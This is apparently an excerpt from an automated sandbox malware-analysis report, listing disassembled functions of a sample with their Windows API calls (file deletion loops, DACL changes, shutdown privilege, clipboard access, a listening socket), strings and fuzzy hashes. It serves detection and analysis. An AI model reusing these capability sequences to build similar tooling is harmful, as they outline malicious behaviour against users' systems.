                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A31D13250A619BADB14EBB5EC48EDE73AC9F46325F104066FD10E21D0DB70EA48CB64
                                                                                                                                                                                      Function 0095219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 009521C0
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 009521D5
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 009521EC
                                                                                                                                                                                        • Part of subcall function 00947606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00947621
                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0095221B
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00952226
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00952242
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00952269
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00952280
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00952292
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(009B3A68), ref: 009522B0
                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 009522BA
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 009522C7
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 009522D7
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                      • API String ID: 1824444939-438819550
                                                                                                                                                                                      • Opcode ID: 2ce5da6bc7b6f02fa9bbe0780a68adcb5fdd2192f1cc7fd9cc1e8ad6e584c9e2
                                                                                                                                                                                      • Instruction ID: e88d84e6fe823887552720f9b71f6b8deadcaf5771ef85bec03339caf32db3ca
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ce5da6bc7b6f02fa9bbe0780a68adcb5fdd2192f1cc7fd9cc1e8ad6e584c9e2
                                                                                                                                                                                      • Instruction Fuzzy Hash: A031E63690A219BACF18EFA5EC48EDE77AC9F46325F104155EC20A21D0DB70DF89DB64
                                                                                                                                                                                      Function 00906BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memmove_memset
                                                                                                                                                                                      • String ID: Q\E$[$\$\$\$]$^
                                                                                                                                                                                      • API String ID: 3555123492-286096704
                                                                                                                                                                                      • Opcode ID: 00a32c3d6a1ec5e178bef2425930eef68d0d87527799afa0bd5cfbf69fb623c5
                                                                                                                                                                                      • Instruction ID: cd232bba02c349aa2f7cfa9f94f4ede876912f65596b27360162339169a03476
                                                                                                                                                                                      • Opcode Fuzzy Hash: 00a32c3d6a1ec5e178bef2425930eef68d0d87527799afa0bd5cfbf69fb623c5
                                                                                                                                                                                      • Instruction Fuzzy Hash: BE72AD71E04219CFDF28DF98C8906ADB7B5FF84314F2485A9D855AB381E338AE85DB50
                                                                                                                                                                                      Function 0092BDF6 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: ad90efb892bfa5d06f8ddab6bad183a5a84f0d754b1cc2500eab83700cb80c6c
                                                                                                                                                                                      • Instruction ID: 8aee5561cdc0368e0cf631e5d94f4ca270defab43f2e89d53484dc80c880cf22
                                                                                                                                                                                      • Opcode Fuzzy Hash: ad90efb892bfa5d06f8ddab6bad183a5a84f0d754b1cc2500eab83700cb80c6c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 01324CB5A162298FDB248F54ED41AEDB7B5FF46310F0441D9E40AE7A89D7309E80CF52
                                                                                                                                                                                      Function 0093B398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0093B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0093B903
                                                                                                                                                                                        • Part of subcall function 0093B8E7: GetLastError.KERNEL32(?,0093B3CB,?,?,?), ref: 0093B90D
                                                                                                                                                                                        • Part of subcall function 0093B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0093B3CB,?,?,?), ref: 0093B91C
                                                                                                                                                                                        • Part of subcall function 0093B8E7: HeapAlloc.KERNEL32(00000000,?,0093B3CB,?,?,?), ref: 0093B923
                                                                                                                                                                                        • Part of subcall function 0093B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0093B93A
                                                                                                                                                                                        • Part of subcall function 0093B982: GetProcessHeap.KERNEL32(00000008,0093B3E1,00000000,00000000,?,0093B3E1,?), ref: 0093B98E
                                                                                                                                                                                        • Part of subcall function 0093B982: HeapAlloc.KERNEL32(00000000,?,0093B3E1,?), ref: 0093B995
                                                                                                                                                                                        • Part of subcall function 0093B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0093B3E1,?), ref: 0093B9A6
                                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0093B3FC
                                                                                                                                                                                      • _memset.LIBCMT ref: 0093B411
                                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0093B430
                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 0093B441
                                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0093B47E
                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0093B49A
                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 0093B4B7
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0093B4C6
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0093B4CD
                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0093B4EE
                                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 0093B4F5
                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0093B526
                                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0093B54C
                                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0093B560
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3996160137-0
                                                                                                                                                                                      • Opcode ID: d09e2fad948336f81496fc901eb2b62cfcdf4c7537d3abe86bfd39038f6a4077
                                                                                                                                                                                      • Instruction ID: 7c861654440c679f79a10ded3d148a55d1a4dca45c51c9eb4090e23f0b099553
                                                                                                                                                                                      • Opcode Fuzzy Hash: d09e2fad948336f81496fc901eb2b62cfcdf4c7537d3abe86bfd39038f6a4077
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F51287190020AAFDF04DFA4DC45AEEBBB9FF44314F148129FA15AB2A1DB359A05DF60
                                                                                                                                                                                      Function 00946E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 009031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 009031DA
                                                                                                                                                                                        • Part of subcall function 00947C0C: GetFileAttributesW.KERNEL32(?,00946A7B), ref: 00947C0D
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00946E7E
                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00946E99
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00946EAE
                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00946EDD
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00946EEF
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00946F01
                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00946F0E
                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00946F22
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00946F3D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                      • API String ID: 2643075503-1173974218
                                                                                                                                                                                      • Opcode ID: ca074a3861d130fdeca5f330912a9d3b7496cfd1604341a2c79ac0b0f7dfee35
                                                                                                                                                                                      • Instruction ID: 92d8d83a006b01d1626883df5611a9ce621f26d690b38913d4b3dcbdc2b17c39
                                                                                                                                                                                      • Opcode Fuzzy Hash: ca074a3861d130fdeca5f330912a9d3b7496cfd1604341a2c79ac0b0f7dfee35
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2921B1B240D344AEC310EBA4A884EDBBBDC9F9A214F444A5AF5D4C3141EB30D65D87A2
                                                                                                                                                                                      Function 00957294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1737998785-0
                                                                                                                                                                                      • Opcode ID: 23479fda07d466a3beb2b61cc8e5eb0525653203943dfd1e230c894648533c70
                                                                                                                                                                                      • Instruction ID: 140c2a7e14e3b8d4dda5b731e9a6fc199d2f4329d9b2a6d01255ad453b5c1ed0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 23479fda07d466a3beb2b61cc8e5eb0525653203943dfd1e230c894648533c70
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8121A335619114AFD700AF65EC49F6DB7A8FF44721F008015F949DB2A1EB34EE409B94
                                                                                                                                                                                      Function 009524A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 009524F6
                                                                                                                                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00952526
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0095253A
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 00952555
                                                                                                                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 009525F3
                                                                                                                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00952609
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                      • API String ID: 713712311-438819550
                                                                                                                                                                                      • Opcode ID: 87e485aab32e21a469c330f0f75599d77c6460931f5ff1892f116d5c0df58fe3
                                                                                                                                                                                      • Instruction ID: 9c04de45364a9acdc1cdad01461764fb5730a0d704228c564728ac3637683b62
                                                                                                                                                                                      • Opcode Fuzzy Hash: 87e485aab32e21a469c330f0f75599d77c6460931f5ff1892f116d5c0df58fe3
                                                                                                                                                                                      • Instruction Fuzzy Hash: B341AF7190521AAFCF14DFA5CC89AEEBBB8FF45311F204456F815A6190E7309A89DF50
                                                                                                                                                                                      Function 00908CA0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                                                                                      • API String ID: 0-1546025612
                                                                                                                                                                                      • Opcode ID: a1ffeae3eb15785523efa04e26356cd314d0157f25b43c516d0e3b0133e70fc7
                                                                                                                                                                                      • Instruction ID: f065fda15d4eea87f9a5336505d740316bb52200095bbc2feecdc03a5020ac5a
                                                                                                                                                                                      • Opcode Fuzzy Hash: a1ffeae3eb15785523efa04e26356cd314d0157f25b43c516d0e3b0133e70fc7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E926AB1E0021A8FDF24DF68C8407ADB7B5BB54314F1485AAE85AAB3C1D7749D81CFA1
                                                                                                                                                                                      Function 00908530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                                                                      • Opcode ID: 34f2b006550da59b10969414874117214501872a7ae76314ddfc9c1dfa318566
                                                                                                                                                                                      • Instruction ID: 4f6398a8a70d593aecd1cd1507b9bdcf91bf1a567433685f2a0f2036e979eed3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 34f2b006550da59b10969414874117214501872a7ae76314ddfc9c1dfa318566
                                                                                                                                                                                      • Instruction Fuzzy Hash: 17129F71A00609DFDF14DFA4D981AEEB7F5FF48300F208569E84AE7295EB35A910CB54
                                                                                                                                                                                      Function 009482D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0093BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0093BF0F
                                                                                                                                                                                        • Part of subcall function 0093BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0093BF3C
                                                                                                                                                                                        • Part of subcall function 0093BEC3: GetLastError.KERNEL32 ref: 0093BF49
                                                                                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 0094830C
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                      • String ID: $@$SeShutdownPrivilege
                                                                                                                                                                                      • API String ID: 2234035333-194228
                                                                                                                                                                                      • Opcode ID: a22efe5576e15621dfe78ff08a62a0f8930a23d20b5d35e2fae43ca4c4d73f9e
                                                                                                                                                                                      • Instruction ID: e60f0e6569b9c34c7c8f97dd675a1c1c0b40b8a16ac55747d9fd8d33a56f9575
                                                                                                                                                                                      • Opcode Fuzzy Hash: a22efe5576e15621dfe78ff08a62a0f8930a23d20b5d35e2fae43ca4c4d73f9e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7701A771654311ABEB786E788C4AFBF735CDB04F84F140824FA53E21D1DE649C0092A4
                                                                                                                                                                                      Function 009591DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00959235
                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00959244
                                                                                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00959260
                                                                                                                                                                                      • listen.WSOCK32(00000000,00000005), ref: 0095926F
                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00959289
                                                                                                                                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 0095929D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1279440585-0
                                                                                                                                                                                      • Opcode ID: 7448eee6120bf05b907c8426451352603556adb0b705cee3a26ba348ba622a59
                                                                                                                                                                                      • Instruction ID: cc4a416170a30b1ae0964a8a9009a78aa4ef4e87a4c52712ad0c3e3fba0d4eb4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7448eee6120bf05b907c8426451352603556adb0b705cee3a26ba348ba622a59
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6521BC75600200EFDB00EF64CC85B6EB7A9EF84725F148119F966AB3D1CB70AD45DB51
                                                                                                                                                                                      Function 0090A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0092010A: std::exception::exception.LIBCMT ref: 0092013E
                                                                                                                                                                                        • Part of subcall function 0092010A: __CxxThrowException@8.LIBCMT ref: 00920153
                                                                                                                                                                                      • _memmove.LIBCMT ref: 00973020
                                                                                                                                                                                      • _memmove.LIBCMT ref: 00973135
                                                                                                                                                                                      • _memmove.LIBCMT ref: 009731DC
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1300846289-0
                                                                                                                                                                                      • Opcode ID: 5ac19dfdac046108b062d5a1395449b3707ba654750fc19c0f376a0dd1a42c5c
                                                                                                                                                                                      • Instruction ID: b91077263e32ceb6aaac399e7027c253693d57cc9aee94eb18126729acaa8942
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ac19dfdac046108b062d5a1395449b3707ba654750fc19c0f376a0dd1a42c5c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6602D271A04209DFCF04DF68D981AAEB7F5EF88300F54C469E80ADB295EB35DA51CB91
